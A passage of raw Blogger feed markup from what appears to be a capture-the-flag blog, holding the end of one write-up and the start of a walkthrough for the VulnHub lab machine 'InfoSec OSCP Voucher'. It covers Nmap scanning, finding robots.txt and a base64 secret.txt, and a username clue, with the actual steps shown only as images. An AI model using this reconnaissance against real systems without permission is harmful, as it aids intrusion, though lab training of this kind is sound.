style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;6 - CAPTURING THE 2nd FLAG&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFMA2qbBJ_-p2Aq3MT7-mJObh2c7ZS-PWp3Di-WP0ESR2uxbeTbJsNmHifzayVycvEpnHTGyXRYyuW8GnvoTAMfOB8AQwZDgzipfSDfHoSlIu8mA19uRIdMJj28i2vb1nmMjqobbtgFMUrjNUuCvILEwyM-jAPOkd4TWIJbsSjBVy9y99BJl2ZISldqQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;418&quot; data-original-width=&quot;1372&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFMA2qbBJ_-p2Aq3MT7-mJObh2c7ZS-PWp3Di-WP0ESR2uxbeTbJsNmHifzayVycvEpnHTGyXRYyuW8GnvoTAMfOB8AQwZDgzipfSDfHoSlIu8mA19uRIdMJj28i2vb1nmMjqobbtgFMUrjNUuCvILEwyM-jAPOkd4TWIJbsSjBVy9y99BJl2ZISldqQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/5162906801237257630'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/5162906801237257630'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/healthcare.html' title='Healthcare'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEhGAZ2uDjbCopVYBK7ERcxQNj25YJ6YPoH79eLLAP6TFqzSDZz5YFUuGrbegyXZ8o7B8A-UvoA81MSGyfMMDzHZsFd55EOS3MUW03djozGYgmjLLBTMpeqw_WGrklQkalPmz6K8SdTjbFo6WZjsMo6fh5eeAli2mxU-2zoUPoNVLeaLszgI0daUIZwk1g=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-49046819424456350</id><published>2022-03-01T10:06:00.000-06:00</published><updated>2022-03-01T12:42:29.973-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>InfoSec OSCP Voucher</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;INFOSEC OSCP VOUCHER&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgKzgj11MiOlrwJ6nVhcm15LsHENuiQnxDr98jYB3QAv9rT3ypT41-tzkSq8E5Q0URcyXmdSC3MCO4_aedxAQSeKcDBssIgQk7OSYZ_VOGBVvnxueceizK_OlQUTx6cdvppbfzhaleW2uMDDiOC_U0QIklkA2p3ESUOXqYN5D2Y9cQR-Z6FcReLepCzHw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;243&quot; data-original-width=&quot;651&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgKzgj11MiOlrwJ6nVhcm15LsHENuiQnxDr98jYB3QAv9rT3ypT41-tzkSq8E5Q0URcyXmdSC3MCO4_aedxAQSeKcDBssIgQk7OSYZ_VOGBVvnxueceizK_OlQUTx6cdvppbfzhaleW2uMDDiOC_U0QIklkA2p3ESUOXqYN5D2Y9cQR-Z6FcReLepCzHw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise&amp;nbsp;is to develop a hacking process&amp;nbsp;for the vulnerable machine&amp;nbsp;&lt;b&gt;InfoSec OSCP Voucher&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;&lt;b&gt;InfoSec OSCP Voucher&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/infosec-prep-oscp,508/&quot;&gt;https://www.vulnhub.com/entry/infosec-prep-oscp,508/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi-YDflRXyQOQ3ri4mgQBn7zY8szLITXHyKIOb7yi5FVIOS1qplTIc0cjrCPsbZWymqKrqsibRIc1YSPfzlrWlHpf1nNXGpso0RVgkvXPh7FDFhDUY2kTh6PJsT64fAu7uR9TfuJel6PF6eC_pwpYBtd-JpdKC6cQ_XUpJKZesDwomaDHiVFlBTKRVCjQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;152&quot; data-original-width=&quot;244&quot; height=&quot;164&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi-YDflRXyQOQ3ri4mgQBn7zY8szLITXHyKIOb7yi5FVIOS1qplTIc0cjrCPsbZWymqKrqsibRIc1YSPfzlrWlHpf1nNXGpso0RVgkvXPh7FDFhDUY2kTh6PJsT64fAu7uR9TfuJel6PF6eC_pwpYBtd-JpdKC6cQ_XUpJKZesDwomaDHiVFlBTKRVCjQ=w263-h164&quot; width=&quot;263&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgooNOLPulMUMdBggwzTDqDFUJzoG_3xb4ejcfGCdQmRj76fDfQPY8JlUxt8JjTSP3EuxofTVbo2COREyhV02DM70xpGw4yxGCV6ufly83DgZF-Ql5zr0y65pijHk30q_tm0GvI73gnG7Aq6tw7WyE3j_sYgpfiFMXhRuSsZOnXCMLDq_osF06UQSkGIA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;184&quot; data-original-width=&quot;429&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgooNOLPulMUMdBggwzTDqDFUJzoG_3xb4ejcfGCdQmRj76fDfQPY8JlUxt8JjTSP3EuxofTVbo2COREyhV02DM70xpGw4yxGCV6ufly83DgZF-Ql5zr0y65pijHk30q_tm0GvI73gnG7Aq6tw7WyE3j_sYgpfiFMXhRuSsZOnXCMLDq_osF06UQSkGIA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 80 we find &lt;b&gt;robots.txt&lt;/b&gt; and the file &lt;b&gt;secret.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi8U18BAP3qIZApqO1z75B74INnu1lwKR3zHJa1P822K9WQVFkQ2KGPEdX1CADN_tCF1xI_fEGTZHcC6s7K7jerIZRz0NL5Enof3hacCFNYvT2DeO0wECeDOsxUEnXQO135Sfqa0wrZndrSUbLNJf2XMwbhj4amCYg9qgtxZOJGsfamsSePHtvHVsWIKw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;276&quot; data-original-width=&quot;706&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi8U18BAP3qIZApqO1z75B74INnu1lwKR3zHJa1P822K9WQVFkQ2KGPEdX1CADN_tCF1xI_fEGTZHcC6s7K7jerIZRz0NL5Enof3hacCFNYvT2DeO0wECeDOsxUEnXQO135Sfqa0wrZndrSUbLNJf2XMwbhj4amCYg9qgtxZOJGsfamsSePHtvHVsWIKw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjMOR9Ljqlpvvkr9hzCnyESvBa3g0yLLNHdtgEk7NknC2Ulu6QxUubMzl9tKQTeHPcX1_KOz_ZmujulJyAB0iiVMKjOupltJnBhO1d6vsQcJSGSPRY-aJ_-_sXUBUy7EDg9Hk0K9UY5d5eBOaYLX2Y9s__v9d89FZ9vZxzxn5qNUP00Djucxxhl7lfSzQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;848&quot; data-original-width=&quot;691&quot; height=&quot;714&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjMOR9Ljqlpvvkr9hzCnyESvBa3g0yLLNHdtgEk7NknC2Ulu6QxUubMzl9tKQTeHPcX1_KOz_ZmujulJyAB0iiVMKjOupltJnBhO1d6vsQcJSGSPRY-aJ_-_sXUBUy7EDg9Hk0K9UY5d5eBOaYLX2Y9s__v9d89FZ9vZxzxn5qNUP00Djucxxhl7lfSzQ=w582-h714&quot; width=&quot;582&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However the most interesting piece of information is at the bottom part: &lt;i&gt;&quot;the only user on this box is &lt;b&gt;oscp&lt;/b&gt;&quot;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh_pw6O4Y0AOSvfKf5nefWT5bXRu4KeJwNTfljh1ZQq6oUGauejpGFxVe1RFPtlIvytsJ5pU-iwMBM2LWSxJFc2Z9scM3Md-j-_arWX8j3dobHULGXH89ihd9GOgaM9a4ncjrdcSjq-gy9jK_DvPNLtLE4g5kzwZNqIN5AKuFU7RCgl4Pru0dkJZAhScg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;385&quot; data-original-width=&quot;636&quot; height=&quot;349&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh_pw6O4Y0AOSvfKf5nefWT5bXRu4KeJwNTfljh1ZQq6oUGauejpGFxVe1RFPtlIvytsJ5pU-iwMBM2LWSxJFc2Z9scM3Md-j-_arWX8j3dobHULGXH89ihd9GOgaM9a4ncjrdcSjq-gy9jK_DvPNLtLE4g5kzwZNqIN5AKuFU7RCgl4Pru0dkJZAhScg=w577-h349&quot; width=&quot;577&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;secret.txt&lt;/b&gt; is a large text file ended with &lt;b&gt;==&lt;/b&gt; , so it is probably encoded with base64:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEju7bbFT8nAOSiaQBzsBrDsUP5J4tCzNVBHC5Z0qpfiTEku-4HDMlvs0_hn3s1Mn_ofbvdjopEV0A7AxXeBT7kBLdpHi7A06fUbKkRdcU9JEEGefONB5duy1S6PSyeAjv8Onf-D3aB6FmqoRVd8Ri7oJOiD2snrlYbkeV1dhqSrPGmxGoebBzJ-U-v5Bg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;149&quot; data-original-width=&quot;369&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEju7bbFT8nAOSiaQBzsBrDsUP5J4tCzNVBHC5Z0qpfiTEku-4HDMlvs0_hn3s1Mn_ofbvdjopEV0A7AxXeBT7kBLdpHi7A06fUbKkRdcU9JEEGefONB5duy1S6PSyeAjv8Onf-D3aB6FmqoRVd8Ri7oJOiD2snrlYbkeV1dhqSrPGmxGoebBzJ-U-v5Bg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEix0F3zs_YMOkPC7Rjm5fUB9GXy1OsX7l3Hn6Yde0qxAAU9ElyYUbcjbJIRyojJ-MOzqzPo8M_cMJyaCyBmaf44Jj3ee2wiY9zlPhZqC1aq5oSuj-LmPbk4knra9_6fPltkyo_8jkbGxbORAm66nxwwewWB2RVXsNDQiDAsaWkYbQPp5zdjlTpAgWeiFg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;861&quot; data-original-width=&quot;708&quot; 